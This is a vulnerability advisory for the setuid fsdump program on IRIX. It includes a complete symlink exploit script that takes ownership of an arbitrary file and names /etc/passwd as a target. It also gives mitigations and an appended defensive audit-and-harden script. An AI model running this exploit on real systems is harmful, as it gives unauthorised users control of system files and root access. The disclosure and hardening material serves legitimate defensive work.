COMMAND

    /var/rfindd/fsdump

SYSTEMS AFFECTED

    IRIX 5.x, 6.0, 6.0.1, 6.1, 6.2

PROBLEM

    The   fsdump   program   is   found   in   the  eoe.sw.rfindd  and
    eoe2.sw.rfindd  subsystems  which  are  not  installed by default.
    As  optional  subsystems,  these   packages  must  be   explicitly
    installed for use.  Only systems with  the fsdump program  present
    are vulnerable.

    A single run of fsdump is enough to make yourself the owner of any
    file on the system: the program chown()s its fsdump.pag and fsdump.dir
    work files to the user who invoked it, so pointing one of those names
    at another file via a symbolic link hands that file to the invoker.

    ------------------------------------------------------------------
        #!/bin/sh
        # gimmedump.sh
        #
        # This exploits the serious vulnerability in IRIX's fsdump(1M)
        # program  and attempts  to change  the owner  of an arbitrary
        # file  to  yourself.  (You  know /etc/passwd is an  excellent
        # target.)  Tested on both IRIX 5.3 and IRIX64 6.2.
        # I think  this bug may  be exploited on  any version of  IRIX
        # machines currently running.
        # Here are some system call traces on the program, which  show
        # what the problem is:
        #
        #  379mS getuid() = 1128 euid=0
        #  379mS getuid() = 1128 euid=0
        #  379mS getuid() = 1128 euid=0
        #  379mS getgid() = 20 egid=20
        #  379mS chdir(/usr/var/tmp/) OK
        #  380mS chmod(gimme, 0644) errno = 2 (No such file or directory)
        #  380mS chown(gimme, 1128, 20) errno = 2 (No such file or directory)
        #  380mS chmod(fsdump.pag, 0644) OK
        #  380mS chown(fsdump.pag, 1128, 20) OK
        #  380mS chmod(fsdump.dir, 0644) OK
        #  381mS chown(fsdump.dir, 1128, 20) OK
        #
        # 1996 10.23    Jaechul Choe, CS Dept. in KAIST, Republic of Korea
        #               poison@worak.kaist.ac.kr

        PROG="`basename $0`"
        if [ $# -ne 1 ]; then
                echo "Usage: $PROG <target>"
                exit 1
        fi

        if [ ! -f /var/rfindd/fsdump ]; then
                echo "fsdump doesn't exist! - exiting"
                exit 1
        fi

        cd /tmp
        ln -s $1 fsdump.dir
        echo "Be patient! It will take some time to run."
        echo "If you can't really wait, strike Ctrl-Z and see to the target file.\n"
        /var/rfindd/fsdump -Fgimme /
        echo "\nDone. Here is the result."
        ls -al $1
        rm -f fsdump.dir fsdump.pag gimme
        exit 0

SOLUTION

    chmod -s /var/rfindd/fsdump

    This stops the exploit, but it also breaks fsdump (and with it the
    rfind indexing it feeds).  The whole idea of rfind is sort of risky
    anyway, and I haven't heard about people using it a lot, so if you
    are concerned about the security on your system, you may want as
    well to do this:

        chkconfig rfindd off

    Or, alternatively, you can wait for a patch from SGI.  Chances are,
    it'll be out this millennium (but I wouldn't bet on it).
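    The following audit-and-harden script is an added example, not part
    of the original advisory or of SGI's software.  It checks whether
    the fsdump binary is present with the setuid bit set, strips the bit
    exactly as the chmod -s above does, and reads the rfindd chkconfig
    flag so an administrator can confirm both mitigations on a host.  It
    assumes IRIX's chkconfig convention of an on/off flag file under
    /etc/config (a missing flag file is treated here as "off"); the
    function and variable names, and the --audit switch, are this
    example's own.

```shell
#!/bin/sh
# fsdump_audit.sh  (added example; not from the advisory)
# Audit and remediate the setuid fsdump exposure described above.

FSDUMP_PATH="${FSDUMP_PATH:-/var/rfindd/fsdump}"   # path named in the advisory
CONFIG_DIR="${CONFIG_DIR:-/etc/config}"            # assumed IRIX chkconfig flag dir

# is_setuid PATH -> exit 0 if PATH is a regular file with the setuid bit set.
# Uses the 4th character of `ls -ld` ('s' or 'S') so it works without GNU stat.
is_setuid() {
    [ -f "$1" ] || return 1
    mode=$(ls -ld "$1" | cut -c4)
    case "$mode" in
        s|S) return 0 ;;
        *)   return 1 ;;
    esac
}

# audit_fsdump PATH -> prints one word: absent | setuid | hardened
# "absent" means the optional eoe.sw.rfindd subsystem is not installed.
audit_fsdump() {
    if [ ! -f "$1" ]; then
        echo absent
    elif is_setuid "$1"; then
        echo setuid          # exploitable as described in the advisory
    else
        echo hardened        # setuid bit already removed
    fi
}

# harden_fsdump PATH -> applies the advisory's fix (chmod -s) when needed,
# then prints the resulting audit state.
harden_fsdump() {
    if is_setuid "$1"; then
        chmod -s "$1"
    fi
    audit_fsdump "$1"
}

# rfindd_status CONFIG_DIR -> prints the rfindd chkconfig flag: on | off
# (assumption: the flag file holds the word on/off; missing file counts as off)
rfindd_status() {
    cfg="$1/rfindd"
    state=""
    if [ -f "$cfg" ]; then
        state=$(tr -d '[:space:]' < "$cfg" | tr 'A-Z' 'a-z')
    fi
    printf '%s\n' "${state:-off}"
}

# Run as root on the host:  sh fsdump_audit.sh --audit
if [ "${1:-}" = "--audit" ]; then
    echo "fsdump ($FSDUMP_PATH): $(audit_fsdump "$FSDUMP_PATH")"
    echo "rfindd chkconfig flag: $(rfindd_status "$CONFIG_DIR")"
fi
```

    A result of "setuid" together with an rfindd flag of "on" is the
    fully exposed configuration; harden_fsdump followed by
    "chkconfig rfindd off" brings the host to the state the SOLUTION
    section recommends.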